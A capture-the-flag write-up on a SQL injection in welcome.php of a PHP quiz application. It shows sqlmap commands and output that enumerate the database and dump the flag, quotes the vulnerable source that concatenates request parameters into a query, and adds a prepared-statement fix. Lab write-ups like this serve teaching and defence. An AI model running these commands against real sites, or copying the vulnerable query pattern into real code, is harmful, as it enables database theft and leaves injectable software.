…
Vulnerability description: welcome.php in this CMS is vulnerable to SQL injection.
Start the environment and register any account. On the second item, "Ip Networking", click Start while capturing the request, save the captured request as 1.txt, and run sqlmap against it:
```
sqlmap -r 1.txt --dbs --batch --random-agent -p eid
------------------------------------------------------
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
available databases [4]:
[*] ctf
[*] information_schema
[*] mysql
[*] performance_schema
```
With the database name in hand, continue by enumerating the table names, then the column names, and finally dump the field:
```
sqlmap -r 1.txt -D ctf --batch --random-agent -p eid
----------------------------------------------------
Database: ctf
[9 tables]
+-----------+
| rank      |
| user      |
| admin     |
| answer    |
| flag      |
| history   |
| options   |
| questions |
| quiz      |
+-----------+
----------------------------------------------------------------------
sqlmap -r 1.txt -D ctf -T flag --columns --batch --random-agent -p eid
----------------------------------------------------------------------
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type          |
+--------+---------------+
| flag   | varchar(1024) |
+--------+---------------+
-----------------------------------------------------------------------
sqlmap -r 1.txt -D ctf -T flag -C flag --dump --batch --random-agent -p eid
-----------------------------------------------------------------------
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{b90b289c-0dc7-47c9-b6c8-80a7698873cc} |
+--------------------------------------------+
```
Vulnerability analysis: the application is web based quiz system v1.0, and its welcome.php page contains a SQL injection vulnerability. The relevant source is as follows:
```php
<?php
if (@$_GET['q'] == 'quiz' && @$_GET['step'] == 2) {
    $eid   = @$_GET['eid'];   // attacker-controlled, used below without sanitization
    $sn    = @$_GET['n'];     // also concatenated into the same query
    $total = @$_GET['t'];
    // Request parameters are interpolated directly into the SQL string.
    $q = mysqli_query($con, "SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' ");
    echo '<div class = "panel" style= "margin:5%">';
    while ($row = mysqli_fetch_array($q)) {
        $qns = $row['qns'];
        $qid = $row['qid'];
        echo '<b>Question '.$sn.' ::<br /><br />'.$qns.'</b><br /><br />';
    }
}
```
Because eid is user-controlled and is concatenated straight into the query string handed to mysqli_query, a crafted eid value changes the statement's structure, which is the SQL injection.
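For comparison, the same lookup written with a mysqli prepared statement, as an added example rather than code from web based quiz system; `$con` is assumed to be the existing mysqli connection, and the column names `qid` and `qns` are taken from the original block:

```php
<?php
// Added example, not the project's code: the questions lookup from welcome.php
// with eid and n bound as parameters instead of concatenated into the SQL.
// $con is assumed to be the application's existing mysqli connection.
function fetchQuestion(mysqli $con, string $eid, string $sn): ?array
{
    // The statement text is fixed; request values never become SQL syntax.
    $stmt = $con->prepare('SELECT qid, qns FROM questions WHERE eid = ? AND sn = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $con->error);
    }
    // Values travel separately from the statement, so quotes or operators
    // inside $eid are compared as literal data, not parsed as SQL.
    $stmt->bind_param('ss', $eid, $sn);
    if (!$stmt->execute()) {
        $stmt->close();
        throw new RuntimeException('execute failed: ' . $con->error);
    }
    $stmt->bind_result($qid, $qns);   // bind_result avoids a mysqlnd dependency
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? ['qid' => $qid, 'qns' => $qns] : null;
}

if (($_GET['q'] ?? '') === 'quiz' && ($_GET['step'] ?? '') == 2) {
    $eid = (string)($_GET['eid'] ?? '');
    $sn  = (string)($_GET['n'] ?? '');
    $row = fetchQuestion($con, $eid, $sn);
    echo '<div class="panel" style="margin:5%">';
    if ($row !== null) {
        // Output is HTML-escaped as a matter of hygiene before echoing.
        echo '<b>Question ' . htmlspecialchars($sn, ENT_QUOTES) . ' ::<br /><br />'
           . htmlspecialchars($row['qns'], ENT_QUOTES) . '</b><br /><br />';
    }
}
```

Running the same sqlmap command against this version finds no injectable parameter, since the structure of the SELECT can no longer be altered through eid or n.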